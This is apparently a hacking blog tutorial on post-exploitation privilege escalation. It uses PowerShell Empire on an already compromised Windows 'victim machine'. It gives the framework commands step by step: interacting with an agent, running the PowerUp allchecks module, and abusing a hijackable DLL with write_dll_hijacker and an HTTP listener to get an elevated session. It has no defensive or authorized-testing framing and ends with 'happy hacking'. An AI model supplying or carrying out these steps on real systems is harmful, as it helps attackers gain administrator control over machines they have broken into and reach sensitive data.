So in one way or another, you’ve got your shell on the victim machine. Well done. After doing a quick ‘sysinfo’ you notice that you’re not the administrator user, hence the modules you can use are limited to basic operations. To get access to the sensitive data and operations, you must escalate your privileges to an administrator account. But how do you do it?

PowerShell Empire is here to help you. It offers a wide range of privilege escalation modules, ranging from mimikatz to PowerUp, allowing you to escalate privileges even on systems containing the newest patches. It also includes modules such as sherlock, that are based on exploiting unpatched Windows operating systems.

In this article, we will assume that you already have a working non-administrator account PowerShell Empire shell on the victim machine (you can see how you can get the shell on our previous article).

Okay, enough theory, let’s get it started. Interact with your existing agent:

agents

interact <agent name>

For this article we will be using the PowerUp module, which has the biggest success rate of all privilege escalation modules in PowerShell Empire.

searchmodule powerup

You will see something like this:

PowerShell Empire Privilege Escalation Modules

The result we have got is a list of PowerShell Empire’s PowerUp privilege escalation modules. The last one, named ‘allchecks’, might catch your sight – and it should. This module performs all privilege escalation checks on the target machine. Let’s use this one:

usemodule privesc/powerup/allchecks

Let’s check if it requires any additional configurations:

options

PowerShell Empire PowerUp Privilege Escalation Module

Perfect! So as we can see, the module is ready to use as is. Let’s run it:

run

When done, you will see the results of a large amount of PowerUp checks done:

Privilege Escalation with PowerShell Empire

As we can see, we have a potentially hijackable DLL (which is the most common case in our experience).

Now, how de we exploit it? The answer is very easy. For each potential AbuseFunction, there is a seperate PowerShell Empire privilege escalation module. Let’s find the one we need by using the keyword DLL:

searchmodule dll

As we can see, one of the results is write_dllhijacker. Sounds just like what we need. Let’s use it:

usemodule privesc/powerup/write_dll_hijacker

Let’s see what options are required to run this module:

options

PowerShell Empire Privilege Escalation

As we do see, we need to set the DllPath (AbuseFunction already supplied it to us), the Listener (in your case it will probably be ‘http’) and then we can run the module. Let’s set these settings and run it.

set DllPath <your DLL path>

set Listener http

run

And thats it! You have a new PowerShell Empire session running in elevated context! If you found that useful, please leave a comment or consider sharing this post. Good luck and happy hacking!